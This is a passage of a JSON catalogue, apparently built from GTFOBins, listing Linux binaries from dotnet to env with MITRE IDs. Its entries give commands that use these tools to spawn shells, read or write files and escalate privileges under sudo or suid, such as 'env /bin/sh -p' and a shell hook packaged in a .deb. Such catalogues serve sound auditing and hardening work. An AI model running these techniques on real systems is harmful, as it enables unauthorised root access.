fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:shell:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:suid","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:unprivileged","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:shell:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dpkg -i x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dstat:inherit:0:sudo","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dstat:inherit:0:unprivileged","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:sudo","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:suid","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:unprivileged","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easy_install:inherit:0:sudo","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easy_install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easy_install:inherit:0:unprivileged","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easy_install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:sudo","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:suid","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:unprivileged","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eb:inherit:0:sudo","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eb:inherit:0:unprivileged","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ed:file-read:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-read:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-read:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:efax:file-read:0:sudo","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/efax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:efax:file-read:0:suid","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/efax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:sudo","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:suid","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:unprivileged","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-read:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-read:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-write:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-write:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:shell:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:shell:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:sudo","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:suid","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:unprivileged","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:sudo","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:suid","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and 